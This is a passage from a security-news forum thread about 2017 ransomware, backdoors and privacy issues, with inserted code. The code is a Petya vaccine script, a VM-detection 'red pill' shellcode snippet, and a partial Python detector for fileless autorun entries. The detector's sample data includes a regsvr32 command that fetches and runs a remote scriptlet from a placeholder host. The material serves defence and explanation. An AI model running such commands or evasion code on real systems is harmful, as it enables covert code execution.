Some use this with a VM to feel a bit more comfy , see: https://www.youtube.com/watch?v=v-CzBkbISLQ
According to this source we can conclude then that they are telling lies in commission:
https://arstechnica.com/information-technology/2017/06/32tb-of-windows-10-beta-builds-driver-source-code-leaked/
Since WannaCry I do not trust M$ very much security-wise, also due to NSA holding M$ sort of hostage.
Do not look at proprietary code; those that do are excluded from work in the IT sector for a couple of years, because of the risks.
With open source however you are free to skim over the source, that is why it is open.
polonus
-
Just waiting for backdoors for strong encryption. Debate ongoing: https://www.attorneygeneral.gov.au/Mediareleases/Pages/2017/SecondQuarter/Tackling-Encryption-and-Border-Security-key-Priorities-at-Five-Eyes-Meeting-in-Ottawah.asp
Just a bit more of the common "t" and "p" arguments will do the job, and these forces will achieve what they are after, despite the fact that knowledge of backdoors will proliferate to cybercriminals and will make everyone's life a bit less secure, also business competition (commercial spies - what businessman is taking his smartphone to the States, for instance, as it comes backdoored by design from Galaxy 4 onwards).
But this mechanism does not hamper those without technical knowledge of how such things work, while those who decide are often not the ones that could do real technical risk management to keep us all safe(r).
polonus
-
Insecurity coming: how you gonna flush DNS when you have no command prompt nor PowerShell?
Shouldn't this version be taken on hold, because it is too restrictive, and has also the known macro vulnerabilities there.
Re: https://arstechnica.com/information-technology/2017/06/microsoft-should-shore-up-windows-10-ss-security-then-offer-it-to-everyone/
polonus
-
All of a sudden today, Avast is giving me a warning that my webmail account for CenturyTel is not safe - phishing, I think it said. It continues to give me the warning even though I set it in the exceptions. Even when I try to do a reply. Of course, I override it but how can I get it to STOP?
BTW, The verification really sucks - I have enough vision problems as it is and have a super hard time reading the letters and the sound option doesn't work at all.
-
1. All of a sudden today, Avast is giving me a warning that my webmail account for CenturyTel is not safe - phishing, I think it said. It continues to give me the warning even though I set it in the exceptions. Even when I try to do a reply. Of course, I override it but how can I get it to STOP?
2. BTW, The verification really sucks - I have enough vision problems as it is and have a super hard time reading the letters and the sound option doesn't work at all.
1. Start a new topic: https://forum.avast.com/index.php?action=post;board=4
2. Only needed for your first 3 posts. (Spam protection)
-
Again a Windows Defender emulator hole found up with a fuzzer after porting Windows Defender onto linux.
Read here: https://twitter.com/taviso/status/878314575149506561
https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2
Will Kaspersky start to moan again, while Tavis Ormandy makes Windows Defender more secure all the time?
polonus
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/
My only surprise would be 'only an 11% increase' in a year. It seems to have been massive recently.
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/
My only surprise would be 'only an 11% increase' in a year. It seems to have been massive recently.
Not if you used Avast:
https://blog.avast.com/avast-and-avg-only-free-antivirus-score-100-av-comparatives-real-world-test
-
Doesn't matter what you use(d), there still is an 11% increase in (new) ransomware.
It is not about how many things are blocked, but detected.
-
Massive Petya Ransomware Attack (GoldenEye)
(http://screencast-o-matic.com/screenshots/u/Lh/1498589006645-46653.png)
More information here (https://www.cnet.com/news/unprecedented-cyberattack-hits-businesses-across-europe/?ftag=CAD1acfa04&bhid=19917032625079717126003489967847) and here (https://labs.bitdefender.com/2017/06/massive-goldeneye-ransomware-campaign-slams-worldwide-users/)
-
Hi bob3160,
Breaking news here indeed, at a grand scale.
Well, someone should finally uphold the American constitution against these NSA spooks, thinking they are above the law, letting this out into cyberspace, now causing global havoc & damage through their EternalBlue zero-day proliferation, also giving Microsoft a bad name. Ransomware worms in the making and causing havoc around the globe.
Globally firms are devastated by Petya in Ukraine and in Russia and now also in the port of Rotterdam, the Netherlands, e.g. Maersk Logistics, http://www.apmterminals.com/500.html?aspxerrorpath=/ -> https://asafaweb.com/Scan?Url=www.apmterminals.com%2F500.html%3Faspxerrorpath%3D Read: http://www.nnit.com/OfferingsAndArticles/Pages/COWI-Upgrades-its-IT-Security.aspx (there were threats from cybercriminals). See also: http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fwww.apmterminals.com%2F500.html%3Faspxerrorpath%3D%2F
The malware, what they now think is a worm, spreading like wildfire, encrypts the MFT on the hard disk (master file table).
CERTs in all sorts of countries are now up in arms. Victims have no more than 30 minutes to take their systems off of the grid and shut them down. Thank you, folks, for making this crap possible (ironic mode on).
polonus
P.S. Great avast is out in the trenches against this, keeping a finger on the pulse through the Wifi-Inspector. 39 million servers vulnerable and haven't been patched. Read: https://blog.avast.com/petya-based-ransomware-using-eternalblue-to-infect-computers-around-the-world
Damian
-
Local killswitch for Petya.
Seems there is a killswitch now: creating c:\windows\perfc, as the ransomware checks for that file and then stops.
Info credits: Amit Serper. The AppLocker feature to block the execution of "perfc.dat" should also do the trick according to Kaspersky Lab.
pol
P.S. For what it is worth: https://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/
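The file-based "vaccine" described above, as an added example written for this post (it is not the post's own code and not Amit Serper's or Kaspersky's script): it creates the two file names mentioned above as read-only files in the Windows directory and then reports their state. The directory is taken from $env:SystemRoot rather than hard-coded as c:\windows, and the function names are my own.

```powershell
# Added example (not from the forum post): create the read-only "vaccine" files that this
# Petya variant checks for before it runs, then verify they are present and read-only.
#Requires -RunAsAdministrator

# Names taken from the post above: perfc is the file the malware tests for;
# perfc.dat is the name given in the AppLocker advice.
$vaccineNames = @('perfc', 'perfc.dat')

function Install-PetyaVaccine {
    param([string]$WindowsDir = $env:SystemRoot)   # assumption: the Windows dir is the check location

    foreach ($name in $vaccineNames) {
        $path = Join-Path $WindowsDir $name
        if (-not (Test-Path -LiteralPath $path)) {
            # Create an empty file; -Force also clears a leftover read-only stub from an earlier run
            New-Item -Path $path -ItemType File -Force | Out-Null
        }
        # Mark it read-only so it is not casually overwritten or deleted by a cleanup script
        Set-ItemProperty -LiteralPath $path -Name IsReadOnly -Value $true
    }
}

function Test-PetyaVaccine {
    param([string]$WindowsDir = $env:SystemRoot)

    foreach ($name in $vaccineNames) {
        $path = Join-Path $WindowsDir $name
        $item = Get-Item -LiteralPath $path -ErrorAction SilentlyContinue
        [pscustomobject]@{
            File     = $path
            Present  = [bool]$item
            ReadOnly = [bool]($item -and $item.IsReadOnly)
        }
    }
}

Install-PetyaVaccine
Test-PetyaVaccine | Format-Table -AutoSize
```

Run it from an elevated PowerShell; both rows should show Present and ReadOnly as True. As the follow-up post in this thread points out, this is a vaccine for the one machine it runs on, not a killswitch: it does nothing to stop the EternalBlue spread to unpatched neighbours, so patching remains the actual fix.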
-
https://blog.kaspersky.com/new-ransomware-epidemics/17314/
https://securelist.com/schroedingers-petya/78870/
-
Vaccine, not Killswitch, Found for Petya (NotPetya) Ransomware Outbreak
https://www.bleepingcomputer.com/news/security/vaccine-not-killswitch-found-for-petya-notpetya-ransomware-outbreak/
-
Microsoft Security Advisory 4033453
Vulnerability in Azure AD Connect Could Allow Elevation of Privilege
https://technet.microsoft.com/library/security/4033453.aspx
-
SLocker Mobile Ransomware Starts Mimicking WannaCry
https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/
-
New Azer CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/
VirusTotal: https://www.virustotal.com/en/file/6f5f3bd509c22f0aec4a55fd4d08b7527be4708145b760bc3bd955c6e7538064/analysis/
-
Decryptor Released for the Mole02 CryptoMix Ransomware Variant
https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-mole02-cryptomix-ransomware-variant/
-
New BTCWare Ransomware Decrypter Released for the Master Variant
https://www.bleepingcomputer.com/news/security/new-btcware-ransomware-decrypter-released-for-the-master-variant/
-
https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
While not sticking to the rules, these certifiers have endangered website visitors and are not trusted any longer by Google.
Background read: https://www.lowendtalk.com/discussion/95618/google-chrome-distrusting-wosign-and-startcom-certificates
Comics can tell more than a thousand words: -http://dilbert.com/search_results?terms=Vast+Power+Of+Certification
pol
-
Most providers and CDNs in cahoots with Big Gubberment. Read: https://www.eff.org/who-has-your-back-2017
This is not about protecting your personal data through security technology, best practices etc.; this just touches transparency,
policy towards end-users. Amazon and WhatsApp have a bad reputation for the total lack of protecting your data against snoopers.
Adobe, Amazon, Apple, Facebook, Google, LinkedIn, Microsoft, T-Mobile, Twitter, WhatsApp, WordPress and Yahoo. Providers Verizon, T-Mobile, Comcast and AT&T just scored one star in protecting your data from Government requests.
polonus
-
Big campaign in the USA for Net Neutrality:
https://www.battleforthenet.com/july12/
polonus
-
Big campaign in the USA for Net Neutrality:
https://www.battleforthenet.com/july12/
polonus
Knowing the political climate here in the good ol' U.S. of A. this looks like a losing cause. :'(
We can always hope. ;)
-
Data of 14 Million Verizon Customers Exposed in Server Snafu
https://www.bleepingcomputer.com/news/security/data-of-14-million-verizon-customers-exposed-in-server-snafu/
-
Don't Open SPAM Containing Password Protected Word Docs
(Should be obvious at this point.)
https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
-
The WPSetup Attack: New Campaign Targets Fresh WordPress Installs
Read: https://www.wordfence.com/blog/2017/07/wpsetup-attack/
The best method for "wizard"-like setups of web applications is to have the set-up done locally at home, and when the set-up is what you like it to be, then you rsync it to the webserver, together with the right permissions and security, and with unnecessary files deleted.
Even better still is using git and making sure through a .gitignore that no vulnerable files land on your live server.
Whenever you do not need an interactive site really, in that case you should make use of a static site generator! (When you need comments on posts you could do that using Disqus - https://gohugo.io/extras/comments/)
For starters there is Hugo, giving the least problems for beginners; http://gohugo.io/
(Info credits go to Soeperees and Neb Poorten, thanks folks)
polonus (volunteer website security analyst and website error hunter)
-
"Particle" Chrome Extension Sold to New Dev Who Immediately Turns It Into Adware
https://www.bleepingcomputer.com/news/security/-particle-chrome-extension-sold-to-new-dev-who-immediately-turns-it-into-adware/
-
New way to boycott or undermine: https://www.theregister.co.uk/2017/07/13/bitcoins_might_just_vanish_into_the_ether/
polonus
-
Retire QuickTime for Windows for good, uninstall!
Read why? Re: https://www.us-cert.gov/ncas/bulletins/SB17-191
polonus (volunteer website security analyst and website error-hunter)
-
Researchers find up serious holes in WebEx: https://bugs.chromium.org/p/project-zero/issues/detail?id=1324
11 holes in Radius found in DHCP and RADIUS packet parsers via fuzzing: https://guidovranken.wordpress.com/2017/07/17/11-remote-vulnerabilities-inc-2x-rce-in-freeradius-packet-parsers/
polonus (volunteer website security analyst and website error-hunter)
Advice: always fully patch, upgrade and backup ;)
D.
-
“Perverse” malware infecting hundreds of Macs remained undetected for years
https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/
-
Adobe Kills Flash Player
http://news.softpedia.com/news/adobe-kills-flash-player-517160.shtml
-
Newly Discovered CowerSnail Backdoor Targets Windows Computers
https://www.bleepingcomputer.com/news/security/newly-discovered-cowersnail-backdoor-targets-windows-computers/
-
CrowdStrike launches malware search engine
https://www.helpnetsecurity.com/2017/07/26/crowdstrike-malware-search-engine/
-
A n o t h e r B i g O n e like Wannacry, and again it is with SMB, called SMBloris!
Re: vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000.
It is an IBM legacy, as SMB v1 is IBM code.
With this you can bring down a bold Windows-server and crash it just using a Raspberry Pi-computer via a very simple attack!
Insecurity coming to a server near you!
Re: https://www.defcon.org/html/defcon-25/dc-25-speakers.html#Dillon
Re: https://threatpost.com/windows-smb-zero-day-to-be-disclosed-during-def-con/126927/
Not clear yet if Windows is ever gonna patch this gaping hole. They said they would not.
MS reacted: For enterprise customers who may be concerned,
we recommend they consider blocking access from the internet to SMBv1.
But also a reversed engineered variant was involved: Barry Feigenbaum originally designed SMB at IBM with the aim of turning DOS "Interrupt 33" (21h) local file access into a networked file system.[11] Microsoft has made considerable modifications to the most commonly used version. Microsoft merged the SMB protocol with the LAN Manager product which it had started developing for OS/2 with 3Com around 1990, and continued to add features to the protocol in Windows for Workgroups (c. 1992) and in later versions of Windows.
When SMB2 was introduced it brought a number of benefits over SMB1 for third party implementers of SMB protocols. SMB1, originally designed by IBM, was reverse engineered, and later became part of a wide variety of non-Windows operating systems such as Xenix, OS/2 and VMS (Pathworks).
source: https://en.wikipedia.org/wiki/Server_Message_Block :
polonus
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/
One should never pay ransom. :o
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/
One should never pay ransom. :o
I'm surprised anyone pays - are you going to trust the crooks that did this - there is no guarantee that even after payment that the encryption can be decrypted/reversed (bad code).
Ransomware surely must be a wakeup call to have a robust backup (off-line) and recovery strategy (hard drive imaging) before anything serious happens and not necessarily ransomware.
-
95% of All Ransomware Payments Were Cashed out via BTC-e Platform
https://www.bleepingcomputer.com/news/security/95-percent-of-all-ransomware-payments-were-cashed-out-via-btc-e-platform/
One should never pay ransom. :o
I'm surprised anyone pays - are you going to trust the crooks that did this - there is no guarantee that even after payment that the encryption can be decrypted/reversed (bad code).
Ransomware surely must be a wakeup call to have a robust backup (off-line) and recovery strategy (hard drive imaging) before anything serious happens and not necessarily ransomware.
By now, you would think that's the case. I'm always surprised while talking to folks at a presentation, that most people don't start a recovery and backup strategy till after a disaster of some type has happened. Many think that an infection or a hardware failure only happens to the other person.
That also holds true for secure passwords and the use of 2 factor ID. Most can't be bothered with the little bit of extra precautions to keep them safe.
Cyber Security Awareness Month is coming up in October. For me it's a packed month with remote presentations scheduled all over the USA.
-
New updates are available for Outlook
https://blogs.technet.microsoft.com/office_sustained_engineering/2017/07/27/new-updates-are-available-for-outlook/
-
Google Revealed an Israeli Spyware Company That Has Quietly Sold Its Wares for Years
https://motherboard.vice.com/en_us/article/evdebz/google-revealed-an-israeli-spyware-company-that-has-quietly-sold-its-wares-for-years
-
Incomplete WordPress installations, especially on shared hosting, come under attack to be compromised:
https://www.wordfence.com/blog/2017/07/wpsetup-attack/
Best way to generate a non-interactive-site for n00bs: http://gohugo.io/
polonus
-
Cerber Ransomware Can Now Steal Browser Passwords, Bitcoin Wallet Data
https://www.bleepingcomputer.com/news/security/cerber-ransomware-can-now-steal-browser-passwords-bitcoin-wallet-data/
-
Department of the Army concerned about DJI drones exposing collected information
http://www.ainonline.com/aviation-news/defense/2017-08-04/us-army-grounds-dji-drones-over-cyber-vulnerabilities
-
Researchers Put Windows Defender in a Sandbox to Show Microsoft How It's Done
https://www.bleepingcomputer.com/news/security/researchers-put-windows-defender-in-a-sandbox-to-show-microsoft-how-its-done/
-
Cyber-Attack on Solar Panels Could Shut Down Power Grids via Domino Effect
https://www.bleepingcomputer.com/news/security/cyber-attack-on-solar-panels-could-shut-down-power-grids-via-domino-effect/
-
Researchers Put Windows Defender in a Sandbox to Show Microsoft How It's Done
https://www.bleepingcomputer.com/news/security/researchers-put-windows-defender-in-a-sandbox-to-show-microsoft-how-its-done/
Doing so increases security but totally degrades performance.
-
Careful, Chrome Extension Developers Under a Barrage of Phishing Attacks
https://www.bleepingcomputer.com/news/security/chrome-extension-developers-under-a-barrage-of-phishing-attacks/
-
Australian Red Cross data breach caused by third-party error
https://www.scmagazine.com/australian-red-cross-data-breach-caused-by-third-party-error/article/680149/
-
L.S.
Whenever you do not want to be associated with visiting so-called conspiracy or fake-news websites, install this into your adblocker of choice: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts
Websites like prison planet, sorcha faal etc, then become blocked, as some official media may frown upon the points of view these websites share.
You can block strictly or just unblock to visit some site once.
polonus
-
Patch this a.s.a.p. as it is an ideal vulnerability to be exploited by malcreants to take over the host: https://www.zerodayinitiative.com/blog/2017/8/8/the-august-2017-security-update-review
-> https://portal.msrc.microsoft.com/en-US/eula
polonus
-
Patch this a.s.a.p. as it is an ideal vulnerability to be exploited by malcreants to take over the host: https://www.zerodayinitiative.com/blog/2017/8/8/the-august-2017-security-update-review
-> https://portal.msrc.microsoft.com/en-US/eula
polonus
The auto update from MS happened yesterday without incident. :)
-
Hi bob3160,
Also landed here while I was fanless quietly computing in N.W. Poland ;)
pol
-
Locky Ransomware Returns with Spam Campaign Pushing Diablo6 Variant
https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-with-spam-campaign-pushing-diablo6-variant/
-
Windows computers open to RDP? Means a gigantic threat: https://community.rapid7.com/community/infosec/blog/2017/08/09/remote-desktop-protocol-exposure
By far most computers open to attack are based in the USA and China. In the Netherlands we find 114.000 computers with tcp-port 3389 open.
polonus
-
2016 Was Bad — 2017 Looks Worse
https://safeandsavvy.f-secure.com/2017/08/09/2016-was-bad-2017-looks-worse/
-
2016 Was Bad — 2017 Looks Worse
https://safeandsavvy.f-secure.com/2017/08/09/2016-was-bad-2017-looks-worse/
Really not new. It's gotten worse every year since they've started to keep records.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
-
Hi bob3160,
Some browsers without any extensions are just as much of a privacy risk.
Google for instance knows more about you than your next of kin.
So I just like a good script blocker and a decent ad-blocker as that is how Google
and others that sell all of your data come by that information, and some of it can/should be blocked.
So you cannot blame extensions (and Google extension api) and let the browser off of the hook.
polonus
-
Hi bob3160,
Some browsers without any extensions are just as much of a privacy risk.
Google for instance knows more about you than your next of kin.
So I just like a good script blocker and a decent ad-blocker as that is how Google
and others that sell all of your data come by that information, and some of it can/should be blocked.
So you cannot blame extensions (and Google extension api) and let the browser off of the hook.
polonus
Your response directed at me and I assume the post I made, has nothing to do with my post or the
advice passed along by that post.
We all know that Google knows a lot about us. So does Bing and Yahoo and many others.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
Very interesting, if your image is one that, and the wording on the bottom of it, has been created by Avast.
Whilst your image isn't related to a browser app, but an Android mobile app.
Then Avast should look closer to home, namely the Avast Battery Saver app for Android. Some time ago I was going to install this, but when I looked at the permissions it required, I backed out of the Play Store. For me the permissions were excessive for what was a battery saver app; they wanted access to very many areas I felt it had no reasonable need for.
Hell the only thing not asked for was my inside leg measurement.
-
Browser Extensions Are a Privacy Nightmare: Stop Using So Many of Them
https://www.howtogeek.com/188346/why-browser-extensions-can-be-dangerous-and-how-to-protect-yourself/
(http://screencast-o-matic.com/screenshots/u/Lh/1502745250853-10341.png)
Very interesting, if your image is one that, and the wording on the bottom of it, has been created by Avast.
Whilst your image isn't related to a browser app, but an Android mobile app.
Then Avast should look closer to home, namely the Avast Battery Saver app for Android. Some time ago I was going to install this, but when I looked at the permissions it required, I backed out of the Play Store. For me the permissions were excessive for what was a battery saver app; they wanted access to very many areas I felt it had no reasonable need for.
Hell the only thing not asked for was my inside leg measurement.
The words on the bottom are mine and this indeed is a caution about installing Apps.
-
8 Google chrome extensions hacked to spread adware:
https://www.proofpoint.com/us/threat-insight/post/threat-actor-goes-chrome-extension-hijacking-spree
Extension published by a bad actor after the legitimate extension was compromised....
With Google Chrome extensions now coming to every major browser (Firefox etc.),
this new browser extension mono-culture makes it much easier for attackers,
and less secure for end-users.
Programmers falling for an insecure link to click, not an unsavvy end-user or a computer nitwit... :o
Where, for Pete's sake, are we heading with browser security?
I, polonus, my dear friends, I fear here with great fear :-X :'(
polonus
-
Ransomware targeting WordPress sites: https://www.wordfence.com/blog/2017/08/ransomware-wordpress/
polonus
-
New Malware Abuses PowerPoint Slide Show
http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-0199-new-malware-abuses-powerpoint-slide-show/
-
The Crisis of Connected Cars: When Vulnerabilities Affect the CAN Standard
http://blog.trendmicro.com/trendlabs-security-intelligence/connected-car-hack/
-
Hundreds of adware infested android-apps in Google Play,
one hundred or so of these adware-laden apps still have not been taken down by Google.
More and more the Google Chrome Android Mono-Culture is becoming a privacy and adware nightmare for end-users,
as the Google chrome browser mono-culture is becoming a likewise threat.
Less and less alternative paths open for those that want to evade these intrusions. :'( :-[
Even Firefox has thrown in the towel to further the Google extension API everywhere.
More attack surface means less defense and bigger threats to the sheeple!!!!
Re: http://blog.trendmicro.com/trendlabs-security-intelligence/ghostclicker-adware-is-a-phantomlike-android-click-fraud/
polonus
-
It’s baaaack: Locky ransomware is on the rise again
https://nakedsecurity.sophos.com/2017/08/17/its-baaaack-locky-ransomware-is-on-the-rise-again/
-
New Disdain Exploit Kit Detected in the Wild
http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/
-
Drupal Core - Multiple Vulnerabilities - SA-CORE-2017-004
https://www.drupal.org/SA-CORE-2017-004
-
500 ad-ridden apps removed by Google from the web store:
http://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Read about the development: https://blog.lookout.com/igexin-malicious-sdk
Mainland China testbed for ad- and spyware for developers and surveillance alike.
Do not read here, as it comes ad-ridden by itself, block link: htxp://www.express.co.uk/life-style/science-technology/818772/Android-warning-Google-Play-adware
Link found in: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-social/hosts (uBlock O).
polonus
-
List of programs to stay away from or be specially cautious with,
because a firm pays to compromise them through zero-days:
hxtps:%2F%2Fzerodium.com%2Fprogram.html&originalURL=973370001&pip=false&premium=false&client_uid=1241509284&client_ver=4.0.6.149&client_type=IEPlugin&suite=false&aff_id=662-187&locale=nl_nl&ui=1&os_ver=6.3.0.0
(link broken by me, as it could be risky for the non-savvy).
Firm is buying zero-days on chat-apps like Signal, WhatsApp, WeChat, Telegram, Facebook Messenger and Viber.
Amazing there are states in the world where such security-endangering trade of zero-days can be performed within legal bounds. :o
polonus
-
New EMPTY CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomware-variant-released/
-
Can it not be made really and one-way secure? HTTP public key pinning: they are giving up on HPKP:
Read on backgrounds:
https://www.theregister.co.uk/2017/08/25/hpkp_crypto_criticism/ (link author = John Leyden)
Because of the complexity and feared attacks like: https://scotthelme.co.uk/using-security-features-to-do-bad-things/
Trust chains must be unbroken, no certs should be issued in error ever, some to trust https://certificatechain.io/
and do not forget to check the code is correct. Cert should be in your DNSSEC authenticated DNS records.
It could come to it that we could also drop most of the root CAs from browsers
or at least devalue them to orange padlocks or something, until explicitly trusted. DANE will come coded into the browser
(Chrome and Firefox). Time to change to DNSSEC, but a lot of banks haven't yet changed... (info source from comments to article)
pol
-
L.S.
Trying to get ring 0 on chips sort of tinkerproof by disabling Intel Management Engine via a new method.
Probably the availability of this bit can only mean NSA requires a possibility to de-install this attack-vector to just use it for themselves. Also consider for instance the new byte by byte load- & tinkerproof Google Titan chip.
Intel and AMD are getting at your data big time, NSA as well as we know by now from the backdoors.
In this case NSA's High Assurance Platform, a NSA trusted platform
(the bit found by researchers in the code was named "reserve_hap")
One thinks it was designed to prevent so-called "side-leaks".
OpenSSL now proven to be crappy and it took Heartbleed to become aware of the real insecure overall 'borked' situation.
So as the going is getting increasingly narrow by using undocumented unsupported features,
there is need for open software alternatives, to see that resource engineering
is not exclusively meant for big government and big business.
Intel AMT handling now looks weird, just AMT being abused to create a worm of sorts,
and WannaCry in comparison would have been a picnic.
Open source CPU, the Chinese will facilitate (but not in the Lenovo way please). Like this: https://www.forbes.com/sites/rogerkay/2015/03/20/openpower-unlocks-floodgates-for-an-all-chinese-server-business/
The POWER9 CPU does not cost that much, but the mainboard is very very expensive (because of the low minimal production volumes) 8)
Another name to mention in this context: http://www.lowrisc.org
polonus (volunteer website security analyst and website error-hunter)
-
I am subscribed to Have I been pwned? and have been notified of a huge email and possible password breach, including my Outlook account.
Breach info: https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
Have I been pwned? info: https://haveibeenpwned.com/
-
Update to Security Bulletin (APSB17-24)
https://blogs.adobe.com/psirt/?p=1484
-
Hi simion,
Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs to-day?
Should not we start to use UIN aliases?
polonus
-
"Roboto Condensed Font" social engineering attack targets firefox and chrome users:
https://malwarebreakdown.com/2017/08/30/roboto-condensed-social-engineering-attack-targets-both-chrome-and-firefox-users-various-payloads-being-delivered/
Can be related to coinminer crypto-currency delving malware or to install Nymaim and Ursnif malware.
So do not fall for the malcode scam... ;)
polonus
-
Hi simion,
Would you check freely at https://haveibeenpwned.com/ ?
I remember the WOT web reputation user database sell-out tragedy.
What does the word TRUST still mean on the Interwebs to-day?
Should not we start to use UIN aliases?
polonus
Greetings pol:
Yes, certainly trust is a dwindling commodity on today's internet. But you must trust someone, or why be on the net at all? To me, it is worth the risk of being registered at a site like Have I been pwned? and having my email possibly sold or stolen in a site database attack. My reward is being notified of account breaches which may include my email, password, real name, address and telephone number, Social Security or other personal government identification numbers. The trade-off is clearly worth it.
I'm not familiar with UIN Aliases, but I fear it might be another database to be lost, stolen, or compromised.
Regards,
Simion
-
Thank you, Simion, for your reaction.
I checked and fortunately all of my present mail accounts were/are secure.
Once we were affected from a hack here on the forums, and all were advised to change their account passwords.
A good old trick I learned from an old-timer admin was to enter a wrong password first and come up with the appropriate one later.
There might be a phase however where we cannot go on any longer without two-phase-authorization.
Certainly education and following best server & client configuration and best practices would help,
but while you visit this site here, you are very well aware of the fact that the security status of the general infrastructure on the Interwebs is far below par.
Those that know how to fence for themselves are slowly becoming a small minority,
and that overall situation does not seem to worry the majority of common users and those parties, the situation at hand is suiting them well. >:(
A sorry situation really but we here cannot make the difference as anyone can :(
Stay safe and secure both online and offline, is the wish of
polonus aka Damian (volunteer website security analyst and website error-hunter)
P.S. on UIN aliases: https://www.ltnow.com/using-aliases-in-gmail/
-
"Fileless" backdoor spreading through usb sticks:
http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/
and
http://blog.trendmicro.com/trendlabs-security-intelligence/usb-malware-implicated-fileless-attacks/
Payload does not go to disk but enters directly into memory.
Only few Anti-Malware tools can protect against such an attack taking effect.
While all say they are performing memory scans,
this only means they detect "KNOWN" malicious code in memory and not in a generic way.
Backdoors can now spread via shortcuts via USB sticks.
This procedure is called "fileless", because in the registry an entry is entered that calls regsvr32,
while an URL is added into Window's scripting engine,
upon which that URL downloads a script and executes it.
So the computer does not have any "infested file". However every time at boot that same malware is being loaded.
As said not all AV is up to protecting against this form of malware (yet).
This also has certain implications for Joanna Rutkowska's idea of the stateless laptop: https://blog.invisiblethings.org/2015/12/23/state_harmful.html
She recently spoke about this at a Hamburg security conference. Re: https://github.com/rootkovska/state_harmful/blob/master/Makefile
Joanna Rutkowska's red pill code:
int swallow_redpill () {
    /* rpill = SIDT [addr]; RET -- stores the IDT register into m (32-bit x86 only) */
    unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3";
    *((unsigned*)&rpill[3]) = (unsigned)m;  /* patch the address of m into the SIDT operand */
    ((void(*)())&rpill)();                  /* jump into rpill (needs an executable stack) */
    return (m[5]>0xd0) ? 1 : 0;             /* a high IDT base byte suggests a VM */
}
meant for VM on Intel machines...
Backdoors like the JS_POWMET fileless malware were mainly detected to exist in the Asia and the Pacific theater.
polonus
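Added here as an illustration, not code from the post or from Trend Micro: a small Python check over constructed Run-key values that flags the registry-entry-plus-regsvr32-plus-URL pattern the post describes (a script host started at logon and handed a remote resource). The sample entries, the example.invalid host and the severity labels are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# values (value name -> command line). Not real data; "example.invalid" is a
# reserved placeholder host that never resolves.
SAMPLE_RUN_VALUES: Dict[str, str] = {
    "OneDrive": r'"C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Codec": r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Codec\codec.dll"',
    "Updater": r'regsvr32 /s /n /u /i:http://example.invalid/upd.sct scrobj.dll',
    "Helper": r'C:\Tools\helper.exe https://example.invalid/cfg',
    "Sync": r'wscript.exe C:\Users\me\sync.vbs',
}

# regsvr32 (named in the post) plus the Windows Script Host binaries: an
# autorun entry that hands one of these a remote URL matches the fileless
# pattern, because nothing malicious needs to exist on disk.
SCRIPT_HOSTS = {"regsvr32.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
# A quoted token or a run of non-whitespace; Run values use this shape.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


@dataclass
class Finding:
    name: str
    severity: str
    reason: str


def image_name(cmd: str) -> str:
    """Lower-cased basename of the launched executable, normalised to '.exe'.

    Unquoted paths with spaces are split at the first space, the same
    ambiguity Windows itself has with such Run values.
    """
    tokens = TOKEN_RE.findall(cmd)
    if not tokens:
        return ""
    first = tokens[0].strip('"')
    name = re.split(r"[\\/]", first)[-1].lower()
    return name if name.endswith(".exe") else name + ".exe"


def inspect_run_value(name: str, cmd: str) -> Optional[Finding]:
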